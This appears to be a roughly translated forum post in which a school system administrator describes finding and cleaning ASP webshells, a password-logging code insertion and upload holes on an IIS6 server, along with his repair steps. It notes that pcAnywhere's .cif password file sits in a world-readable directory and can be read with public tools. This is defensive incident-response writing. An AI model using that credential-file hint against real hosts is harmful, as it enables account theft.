Preface: Due to the particularity of work, I have come into contact with these things. This article only analyzes a simple intrusion and does not have kernel-level *s such as rootki! Experts laugh, for reference only
Text: I just became a system administrator at a certain station in the school and was responsible for 3 hosts. I checked it first and found that there were suspicious files in the skin directory of one host. Haha, I found a problem as soon as I started working, hehe, perform well.
It is certain that this host was hacked.
operate:
1 The system adopts 2003+iis6.0, NTFS partition format, and the permission settings are normal. Pcanywhere10.0 remote management. The page adopts a power article system, modified in version 3.51. To connect to another website, use the modified version of Dynamic Network.
2 Tests found that the former administrator did not pay attention to web security. Power articles have serious upload loopholes and are not patched. Dynamic Network version 7.00sp2, but it is not ruled out that it has been hacked. Immediately, the system was thoroughly inspected and no *s were found. Confirm the host system security. But a large number of webshells are found in the web and are waiting to be cleared. Iis6.0 No logging! (Damn)
3 Check for repair (Back up the current web system.)
A Time search method: Search for all files created and modified after this time based on the earliest creation time of the above file. Many unknown format files such as gif, jpg, asp, cer and other files have been found. Open it with notepad and find it, it is all an asp *. Backup, delete.
B Tool search method: After manual search, install antivirus software to fully antivirus, except for a small number of Asp *s, no other discoveries were found. Check the user, no exceptions. Check the C drive, and there are no unknown files. It means that the intruder did not further increase the permissions after obtaining the web permissions, but it is not ruled out that the installation of more hidden *s is not ruled out. To be checked.
C According to the time search method, it was found that some normal asp files have been modified. Among them, the power article system management page is inserted into the code and the administrator password is saved clearly. The code is similar to the password code obtained by the Dynamic Network Forum plain text.
In other modified asp files, there are * web pages, * horses, * horses, etc., which are all encrypted and processed.
D Repair; back up this web system and extract the database. delete! Restore the system backed up a few months ago, check, no *s! Import the current database. Delete the asp file of the power article upload software and add anti-injection code. Modify all web administrator passwords and modify all system administrator passwords. Upgrade pcanywhere to 11.0 Modify pcanywhere's password and limit ips. Open iis6.0 logging. Due to the attached website, it has not been updated for a long time, the web administrator cannot contact, change the path, remove the connection, and backup!
Analysis: Due to host permission setting issues, intruders may not be able to escalate permissions. (It may have obtained the pcanywhere password, but the host remains locked for a long time. It is estimated that the intruder is still technically weak.) Analysis by the files he left. When obtaining the webshell, it uploads the cmd file, but the permission settings are good, and it is estimated that it can obtain too much information. Upload and wait for files, and want to open the server port 3389. However, due to permission issues, it cannot be improved. Ps: If a host is installed with pcanywhere, the 3389 service will not be enabled, and its main file is replaced by pcanywhere. Can't be turned on. Other files are tools such as observing processes, installing services, etc. It is estimated that the information obtained is not enough to obtain administrator permissions without obtaining higher permissions. The only thing to note is that the password file of pcanywhere is visible to everyone. In *:\Documents and Settings\All Users\Application Data\Symantec, this directory is visible to everyone. There is a password file of pcanywhere *.cif. There is a password viewer on the Internet, but it cannot be viewed in version 11.0. Haha, upgrade.